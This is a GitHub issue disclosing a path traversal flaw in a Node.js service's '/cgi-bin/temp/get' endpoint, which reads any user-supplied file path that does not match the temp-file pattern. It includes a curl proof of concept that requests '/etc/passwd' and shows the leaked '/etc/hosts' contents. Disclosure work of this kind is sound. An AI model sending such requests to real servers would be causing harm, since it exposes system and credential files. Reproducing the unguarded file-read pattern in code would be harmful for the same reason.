Skip to content

Security Vulnerability:Path traversal #1304

Description

@notwo1f

this bug is found by nova ,which is a automatic tools from group of Song Wu, intern ,Zhejiang University ,BoWang independent researcher ,Xingwei Lin, Zhejiang University .

Vulnerability detail:

In service.js, inside
app.get('/cgi-bin/temp/get', ...): var filename = req.query.filename; if (TEMP_FILE_RE.test(filename)) { filename = path.join(TEMP_FILES_PATH, filename); } getFile(filename, ...);

Only when filename matches the temp/ pattern does it get joined to the safe directory TEMP_FILES_PATH.

If it does not match that pattern, the code does not block the request. Instead, it directly uses the user-supplied filename for file reading.

In other words: if you pass passwd, it will read passwd.

POC:
curl -s "http://127.0.0.1:8899/cgi-bin/temp/get?filename=/etc/passwd"

response:

xiaoming@192 ~ % curl -s "http://127.0.0.1:8899/cgi-bin/temp/get?filename=/etc/hosts" {"ec":0,"value":"##\n# Host Database\n#\n# localhost is used to configure the loopback interface\n# when the system is booting. Do not change this entry.\n##\n127.0.0.1\tlocalhost\n255.255.255.255\tbroadcasthost\n::1 localhost\n199.232.68.133 raw.githubusercontent.com\n199.232.68.133 user-images.githubusercontent.com\n199.232.68.133 avatars2.githubusercontent.com\n199.232.68.133 avatars1.githubusercontent.com\n127.0.0.1 lanyundev.com\n\n127.0.0.1 www.proxifier.com\n127.0.0.1 proxifier.com\n140.82.116.4 github.com\n\n# This line is auto added by aTrustAgent, do not modify, or aTrustAgent may unable to work\n127.0.0.1\tlocalhost.sangfor.com.cn\n\n"}%

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions